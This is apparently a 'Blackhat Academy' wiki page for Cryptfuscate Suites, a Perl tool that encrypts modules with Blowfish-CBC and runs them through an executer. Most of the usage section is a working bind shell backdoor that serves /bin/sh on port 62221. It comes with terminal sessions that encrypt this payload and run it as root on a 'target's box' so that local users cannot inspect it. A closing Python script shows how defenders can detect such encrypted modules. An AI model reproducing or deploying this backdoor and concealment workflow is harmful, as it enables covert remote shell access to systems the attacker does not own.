User:Haqaholiq/Cryptfuscate-Suites

Neither Blackhat Academy staff nor the author are responsible, in any way, for the way in which you use this application pack.

Description

Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users, even while it is being executed. Cryptfuscate Suites creates and executes encrypted Perl modules embedded in a text file. Cryptfuscate uses the Blowfish algorithm with cipher-block chaining (CBC) to encrypt Cryptfuscate modules. These modules can in turn be executed by Cryptfuscate Suites' Executer, keeping your Perl source code secure. Cryptfuscate Suites is a faster and more time-consuming alternative to Perl source code obfuscation. It is also an alternative to fussing with perl2exe.

Modules

  • cryptfuscate.pl - encrypts Perl modules embedded in text files to be executed by executer.pl
  • executer.pl - executes Perl modules embedded in 'cryptfuscated' text files.

Download & Installation

Download the package as a tar or zip file, unpack Cryptfuscate Suites, and start using it.

Usage

Below is an example of a bind shell module for Cryptfuscate Suites:

 
use strict;
 
print "  [*] Setting Up Bind Shell on Port 62221...\n";
 
my $system = '/bin/sh';
my $port = 62221;
 
use IO::Socket::INET;
 
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
  or die "  [*] Could not setup backdoor...\n";
 
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
  or die "  [*] Could not setup backdoor...\n";
 
bind(SOCK, sockaddr_in($port, INADDR_ANY))
  or die "  [*] Could not setup backdoor...\n";
 
print "  [*] Done.\n";
 
listen(SOCK, SOMAXCONN)
  or die "  [*] Could not setup backdoor...\n";
 
while(1){
  accept(CSOCK, SOCK);
 
  if(!(my $pid = fork)){
 
    send(CSOCK, "[*] Connected...\n", 0);
 
    # Build interactive shell
    open(*STDIN, ">&CSOCK");
    open(*STDOUT, ">&CSOCK");
    open(*STDERR, ">&CSOCK");
 
    system($system);
 
    close(*STDIN, *STDOUT, *STDERR);
  }
 

We will name this module bd.txt. (This module can be found on GitHub with the rest of the source.)

Now let's use cryptfuscate.pl to create an encrypted version of bd.txt to use as a payload for executer.pl:

 haqaholiq@blackhatacademy$ ./cryptfuscate.pl
 Plaintext Module Path: bd.txt
 Encrypted Module Path: payload.txt
 Encryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d 
 Salt: 19324953
 [*] Text file encrypted successfully...

Our encrypted version of bd.txt (payload.txt):


Next, pack payload.txt with executer.pl and place it on your target's box. Untar it and you're ready to execute your module using executer.pl:

 root@targetbox$ ./executer.pl
 Encrypted Module Path: payload.txt
 Decryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
 Salt: 19324953
   [*] Executing payload...
   [*] Setting Up Bind Shell on Port 62221...
   [*] Done.

We have successfully run our encrypted bind shell payload on port 62221. The source of our payload is completely encrypted, making it impossible for local users to view the source code without knowing the correct encryption key and salt.
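From the defender's side, an encrypted module of this kind can still be recognised on disk by its container format. The following is an added example, not part of Cryptfuscate Suites: it assumes the encrypted text file uses the OpenSSL-compatible salted layout (a `Salted__` marker, an 8-byte salt, then Blowfish-CBC blocks, all base64-encoded), which is what Perl's Crypt::CBC writes by default; the function names and the sample input are constructed for illustration.

```python
import base64
import binascii
import hashlib
import math
from collections import Counter

MAGIC = b"Salted__"   # header marker of the assumed OpenSSL-style layout
BLOCK = 8             # Blowfish block size in bytes


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 is the maximum)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect_module(text: str):
    """Return a finding dict if text looks like a salted CBC blob, else None."""
    try:
        raw = base64.b64decode("".join(text.split()), validate=True)
    except (binascii.Error, ValueError):
        return None                      # not clean base64, e.g. plain Perl
    if not raw.startswith(MAGIC) or len(raw) < len(MAGIC) + 8 + BLOCK:
        return None                      # marker missing or no ciphertext
    salt, body = raw[8:16], raw[16:]
    if len(body) % BLOCK:
        return None                      # CBC output is always whole blocks
    return {"salt": salt, "blocks": len(body) // BLOCK,
            "entropy": round(entropy(body), 2)}


def make_sample(salt: bytes, nblocks: int) -> str:
    """Constructed input: header plus pseudo-random filler, not real ciphertext."""
    filler = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(nblocks))
    return base64.encodebytes(MAGIC + salt + filler[:nblocks * BLOCK]).decode()


if __name__ == "__main__":
    sample = make_sample(b"19324953", 64)   # salt value from the session above
    print(inspect_module(sample))           # finding with salt, blocks, entropy
    print(inspect_module("use strict;\nprint 'hello';\n"))   # None
```

Under this layout the salt is stored in clear in the file header, so the confidentiality of the module rests on the key alone. The `entropy` field helps separate real ciphertext from text that merely starts with the marker.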